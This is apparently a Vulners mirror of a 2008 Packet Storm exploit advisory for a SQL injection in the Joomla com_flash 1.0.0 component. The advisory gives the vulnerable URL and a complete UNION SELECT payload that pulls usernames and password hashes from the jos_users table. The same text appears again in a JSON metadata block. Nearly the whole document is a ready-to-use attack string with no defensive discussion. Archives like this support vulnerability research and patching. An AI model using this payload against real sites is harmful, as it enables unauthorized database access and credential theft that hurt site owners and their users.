Search...

Joomla Flash 1.0.0 SQL Injection

2008-10-11T00:00:00

ID PACKETSTORM:70833
Type packetstorm
Reporter Valon Kerolli
Modified 2008-10-11T00:00:00

Description

                                        
                                            `#############################################################################  
# #  
# Joomla Component com_flash SQL Injection Vulnerability #  
# #  
#############################################################################  
  
  
########################################  
  
[~] Vulnerability found by: Valon Kerolli  
[~] Contact: valon[at]itshqip.com  
[~] Site: www.itshqip.com  
  
########################################  
  
[~] ScriptName: "Joomla"  
[~] Component: "Flash (com_flash)"  
[~] Version: "1.0.0"   
[~] Author: "Newgekko "  
[~] Author E-mail: "webmaster@rire.org"  
[~] Author URL: "www.newgekko.com"  
  
########################################  
  
[~] Exploit: /index.php?option=com_flash&act=view&Itemid=37&id=[SQL]  
[~] Example: /index.php?option=com_flash&act=view&Itemid=37&id=-1337+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--  
  
########################################  
`

JSON Vulners Source

Initial Source

{"reporter": "Valon Kerolli", "enchantments": {"score": {"vector": "NONE", "value": 6.8}, "vulnersScore": 6.8}, "published": "2008-10-11T00:00:00", "cvelist": [], "lastseen": "2016-11-03T10:26:48", "history": [], "id": "PACKETSTORM:70833", "sourceHref": "https://packetstormsecurity.com/files/download/70833/joomlaflash-sql.txt", "objectVersion": "1.2", "sourceData": "`############################################################################# \n# # \n# Joomla Component com_flash SQL Injection Vulnerability # \n# # \n############################################################################# \n \n \n######################################## \n \n[~] Vulnerability found by: Valon Kerolli \n[~] Contact: valon[at]itshqip.com \n[~] Site: www.itshqip.com \n \n######################################## \n \n[~] ScriptName: \"Joomla\" \n[~] Component: \"Flash (com_flash)\" \n[~] Version: \"1.0.0\" \n[~] Author: \"Newgekko \" \n[~] Author E-mail: \"webmaster@rire.org\" \n[~] Author URL: \"www.newgekko.com\" \n \n######################################## \n \n[~] Exploit: /index.php?option=com_flash&act=view&Itemid=37&id=[SQL] \n[~] Example: /index.php?option=com_flash&act=view&Itemid=37&id=-1337+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users-- \n \n######################################## \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "description": "", "references": [], "edition": 1, "title": "Joomla Flash 1.0.0 SQL Injection", "type": "packetstorm", "modified": "2008-10-11T00:00:00", "hash": "76ab86d85e09606f1aefb2efd9e0290702a7ac6f00ff1ae8a454f60192d45c9d", "bulletinFamily": "exploit", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "98328a9f4191f858bab5d9079bdf07f8", "key": "href"}, {"hash": "caa3ac0053ce481fef519a7a28fee29f", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "caa3ac0053ce481fef519a7a28fee29f", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e74b8d3712c6a2a34c14a0c00d00d385", "key": "reporter"}, {"hash": "b35e2283261197fd34e3919f3bdbff65", "key": "sourceData"}, {"hash": "9fabd0cb505f614f67337702ff8c6bd9", "key": "sourceHref"}, {"hash": "b17dbc7773d69f0fd5a87cd623e4a25d", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "href": "https://packetstormsecurity.com/files/70833/Joomla-Flash-1.0.0-SQL-Injection.html", "viewCount": 0}